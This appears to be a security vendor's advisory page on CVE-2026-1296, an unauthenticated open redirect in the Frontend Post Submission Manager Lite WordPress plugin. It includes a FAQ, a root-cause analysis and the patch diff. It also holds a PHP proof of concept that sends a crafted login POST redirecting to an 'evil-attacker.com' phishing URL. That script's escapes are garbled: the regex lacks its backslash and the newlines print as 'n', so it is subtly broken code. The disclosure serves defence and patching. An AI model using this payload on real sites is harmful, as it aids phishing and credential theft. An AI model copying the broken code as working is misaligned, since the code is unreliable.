What is CVE-2026-1296?

CVE-2026-1296 is an unauthenticated open redirect vulnerability found in the Frontend Post Submission Manager Lite plugin for WordPress. It allows attackers to redirect users to arbitrary external websites by exploiting insufficient validation of the ‘requested_page’ parameter.

How does the vulnerability work?

The vulnerability exists in the verify_username_password function, where user-controlled input from the ‘requested_page’ POST parameter is passed directly to the wp_redirect function. This allows attackers to craft a login form that redirects users to a malicious site upon a failed login attempt.

Who is affected by this vulnerability?

All users of the Frontend Post Submission Manager Lite plugin versions up to and including 1.2.7 are affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the Frontend Post Submission Manager Lite plugin and verify if the version is 1.2.7 or earlier.

What should I do to fix this vulnerability?

The vulnerability is patched in version 1.2.8 of the plugin. It is recommended to update to this version immediately to mitigate the risk of exploitation.

Is there a way to mitigate the issue without updating?

While updating is the best solution, you can temporarily disable the plugin to prevent any potential exploitation. Additionally, consider implementing web application firewalls to help block malicious requests.

What does a CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited by attackers, potentially leading to phishing or other malicious activities.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can lead to users being redirected to malicious sites, which could result in phishing attacks, malware distribution, or credential theft. The impact is primarily on the client-side, affecting user trust and security.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send a crafted POST request to the vulnerable plugin, using invalid login credentials and a malicious URL in the ‘requested_page’ parameter. This triggers the open redirect, demonstrating the vulnerability’s exploitability.

What steps should I take if I have been exploited?

If you suspect exploitation, immediately update the plugin to the patched version. Assess your site for any unauthorized changes or malicious content, and inform users about potential phishing attempts to protect their credentials.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1296: Frontend Post Submission Manager Lite <= 1.2.7 – Unauthenticated Open Redirect via 'requested_page' Parameter (frontend-post-submission-manager-lite)

CVE ID CVE-2026-1296

Plugin frontend-post-submission-manager-lite

Severity Medium (CVSS 6.1)

CWE 601

Vulnerable Version 1.2.7

Patched Version 1.2.8

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1296:
The Frontend Post Submission Manager Lite WordPress plugin contains an unauthenticated open redirect vulnerability in versions up to and including 1.2.7. The vulnerability exists in the plugin’s login handling logic, allowing attackers to redirect users to arbitrary external websites.

Atomic Edge research identifies the root cause as insufficient validation of the `requested_page` POST parameter within the `verify_username_password` function. The vulnerable code is located in `/frontend-post-submission-manager-lite/includes/classes/class-fpsml-shortcode.php`. The function uses `wp_redirect()` on lines 96, 105, and 171, passing user-controlled input from `$_POST[‘requested_page’]` and `$_POST[‘redirect_to’]` directly to the redirect function without a safety check. The `esc_url()` function used on line 96 does not prevent open redirects to external domains.

Exploitation requires an attacker to trick a user into submitting a crafted login form or clicking a link that triggers the plugin’s login failure or validation logic. The attack vector is an HTTP POST request containing a `requested_page` parameter set to an external URL. For example, a payload like `requested_page=https://attacker.com` submitted to a page with the plugin’s login shortcode would trigger a redirect upon a failed or empty login attempt. No authentication is required.

The patch in version 1.2.8 replaces all instances of `wp_redirect()` with `wp_safe_redirect()` in the affected file. The `wp_safe_redirect()` function validates that the redirect target is a local, same-host URL, preventing redirection to external domains. The behavioral change is that a malicious external URL in the `requested_page` parameter will now cause the redirect to fail, defaulting to the site’s homepage instead of following the attacker’s link.

Successful exploitation allows an attacker to redirect a victim to a malicious website under their control. This can be used for phishing campaigns, malware distribution, or as a step in a broader attack chain to steal credentials or session cookies. The impact is limited to the client-side redirection of the user’s browser, with no direct server compromise.

Differential between vulnerable and patched code

Code Diff

--- a/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite.php
+++ b/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite.php
@@ -5,7 +5,7 @@
 /*
   Plugin Name: Frontend Post Submission Manager Lite
   Description: A plugin to submit and manage WordPress posts from frontend with or without logging in
-  Version:     1.2.7
+  Version:     1.2.8
   Author:      WP Shuffle
   Author URI:  http://wpshuffle.com
   Plugin URI: http://wpshuffle.com/wordpress-plugins/frontend-post-submission-manager-lite
--- a/frontend-post-submission-manager-lite/includes/classes/admin/class-fpsml-review.php
+++ b/frontend-post-submission-manager-lite/includes/classes/admin/class-fpsml-review.php
@@ -10,7 +10,7 @@
         function save_review_notice_preference() {
             if (isset($_POST['fpsml_hide_review_notice'], $_POST['fpsml_hide_review_notice_field']) && $_POST['fpsml_hide_review_notice'] == 1 && wp_verify_nonce($_POST['fpsml_hide_review_notice_field'], 'fpsml_hide_review_notice')) {
                 update_user_meta(get_current_user_id(), 'fpsml_hide_review_notice', true);
-                wp_redirect(add_query_arg(array('fpsml_review_notice_saved' => '1'), wp_get_referer()));
+                wp_safe_redirect(add_query_arg(array('fpsml_review_notice_saved' => '1'), wp_get_referer()));
             }
         }

--- a/frontend-post-submission-manager-lite/includes/classes/class-fpsml-shortcode.php
+++ b/frontend-post-submission-manager-lite/includes/classes/class-fpsml-shortcode.php
@@ -87,7 +87,7 @@
                 $page_viewed = basename($_SERVER['REQUEST_URI']);

                 if ($page_viewed == "wp-login.php" && $_SERVER['REQUEST_METHOD'] == 'GET') {
-                    wp_redirect($login_page);
+                    wp_safe_redirect($login_page);
                     exit;
                 }
             }
@@ -96,7 +96,7 @@
         function login_failed() {
             if (isset($_POST['requested_page'])) {
                 $login_page = esc_url($_POST['requested_page']);
-                wp_redirect($login_page . '?login=failed');
+                wp_safe_redirect($login_page . '?login=failed');
                 exit;
             }
         }
@@ -105,7 +105,7 @@
             if (isset($_POST['requested_page'])) {
                 $login_page = esc_url($_POST['requested_page']);
                 if ($username == "" || $password == "") {
-                    wp_redirect($login_page . "?login=empty");
+                    wp_safe_redirect($login_page . "?login=empty");
                     exit;
                 } else {

@@ -171,19 +171,19 @@

                     /* Check if captcha is filled */
                     if (empty($captcha)) {
-                        wp_redirect(esc_url($_POST['redirect_to']) . '/?login=captcha_error');
+                        wp_safe_redirect(esc_url($_POST['redirect_to']) . '/?login=captcha_error');
                         exit;
                     } else {

                         $secret_key = (!empty($form_details['security']['secret_key'])) ? $form_details['security']['secret_key'] : '';
                         $captcha_response = wp_remote_get("https://www.google.com/recaptcha/api/siteverify?secret=" . $secret_key . "&response=" . $captcha);
                         if (is_wp_error($captcha_response)) {
-                            wp_redirect(esc_url($_POST['redirect_to']) . '/?login=captcha_error');
+                            wp_safe_redirect(esc_url($_POST['redirect_to']) . '/?login=captcha_error');
                             exit;
                         } else {
                             $captcha_response = json_decode($captcha_response['body']);
                             if ($captcha_response->success == false) {
-                                wp_redirect(esc_url($_POST['redirect_to']) . '/?login=captcha_error');
+                                wp_safe_redirect(esc_url($_POST['redirect_to']) . '/?login=captcha_error');
                                 exit;
                             }
                         }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1296 - Frontend Post Submission Manager Lite <= 1.2.7 - Unauthenticated Open Redirect via 'requested_page' Parameter

<?php

$target_url = 'http://vulnerable-wordpress-site.com/'; // Replace with target site URL

// This PoC simulates a POST request to a page where the plugin's login form is embedded.
// It sets the 'requested_page' parameter to an external attacker-controlled domain.
// A failed login condition triggers the open redirect.

$post_data = array(
    'log' => 'invaliduser', // Invalid username to trigger login failure
    'pwd' => 'invalidpass', // Invalid password
    'requested_page' => 'https://evil-attacker.com/phishing', // The malicious redirect target
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url); // The page containing the plugin's login form
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // Do NOT follow redirects automatically; we want to see the Location header
curl_setopt($ch, CURLOPT_HEADER, true); // Capture headers to see the redirect

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the response contains a redirect to the malicious site
if (preg_match('/^Location:s*' . preg_quote($post_data['requested_page'], '/') . '/mi', $response)) {
    echo "[+] VULNERABLE: The site redirected to the malicious URL.n";
    echo "    Location Header: " . $post_data['requested_page'] . "n";
} else {
    echo "[-] The site may be patched or the exploit conditions were not met.n";
    echo "    HTTP Code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2026-1296?
Understanding the vulnerability
CVE-2026-1296 is an unauthenticated open redirect vulnerability found in the Frontend Post Submission Manager Lite plugin for WordPress. It allows attackers to redirect users to arbitrary external websites by exploiting insufficient validation of the ‘requested_page’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the verify_username_password function, where user-controlled input from the ‘requested_page’ POST parameter is passed directly to the wp_redirect function. This allows attackers to craft a login form that redirects users to a malicious site upon a failed login attempt.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the Frontend Post Submission Manager Lite plugin versions up to and including 1.2.7 are affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the Frontend Post Submission Manager Lite plugin and verify if the version is 1.2.7 or earlier.
What should I do to fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 1.2.8 of the plugin. It is recommended to update to this version immediately to mitigate the risk of exploitation.
Is there a way to mitigate the issue without updating?
Temporary workarounds
While updating is the best solution, you can temporarily disable the plugin to prevent any potential exploitation. Additionally, consider implementing web application firewalls to help block malicious requests.
What does a CVSS score of 6.1 mean?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited by attackers, potentially leading to phishing or other malicious activities.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to users being redirected to malicious sites, which could result in phishing attacks, malware distribution, or credential theft. The impact is primarily on the client-side, affecting user trust and security.
How does the proof of concept demonstrate the issue?
Explaining the PoC
The proof of concept shows how an attacker can send a crafted POST request to the vulnerable plugin, using invalid login credentials and a malicious URL in the ‘requested_page’ parameter. This triggers the open redirect, demonstrating the vulnerability’s exploitability.
What steps should I take if I have been exploited?
Response to exploitation
If you suspect exploitation, immediately update the plugin to the patched version. Assess your site for any unauthorized changes or malicious content, and inform users about potential phishing attempts to protect their credentials.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations